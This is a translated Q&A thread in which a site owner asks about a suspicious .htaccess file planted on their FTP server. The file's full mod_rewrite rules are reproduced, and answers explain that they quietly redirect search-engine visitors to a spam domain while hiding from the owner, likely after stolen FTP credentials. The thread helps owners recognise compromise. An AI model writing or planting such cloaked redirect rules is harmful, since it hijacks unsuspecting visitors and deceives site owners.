这已上传到我的一个 FTP 文件夹。我不熟悉 Apache,但仍然很好奇 - 有人能告诉我这个文件试图犯下什么卑鄙的行为吗?谢谢!
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
答案1
这会将来自搜索引擎的用户发送到最后一个网站SPAMMER.info(请参阅问题历史记录实际的地点)。
它寻找引荐来源以试图隐藏你,因为您可能不会通过搜索引擎访问该网站。也就是说,如果您直接访问 URL,一切似乎都很正常。但是,如果您通过搜索引擎访问,则会被重定向。
注意:才不是影响网络爬虫,因为它们(至少 googlebot)不设置 referrer 标头。
答案2
任何时候用户从搜索引擎访问您网站上的任何页面,他们都会被重定向到 .info 垃圾网站。
它非常隐蔽——你不会注意到任何错误,因为你通常只需输入地址即可。
答案3
补充一点 - 很可能是您的 ftp 凭据被泄露了。也许您将它们保存在 filezilla / total commander 等中。有很多恶意软件会窃取这些信息然后“四处传播” - 登录 ftp 帐户,将恶意 javascript 附加到 index.php / html 或放置类似的重写文件。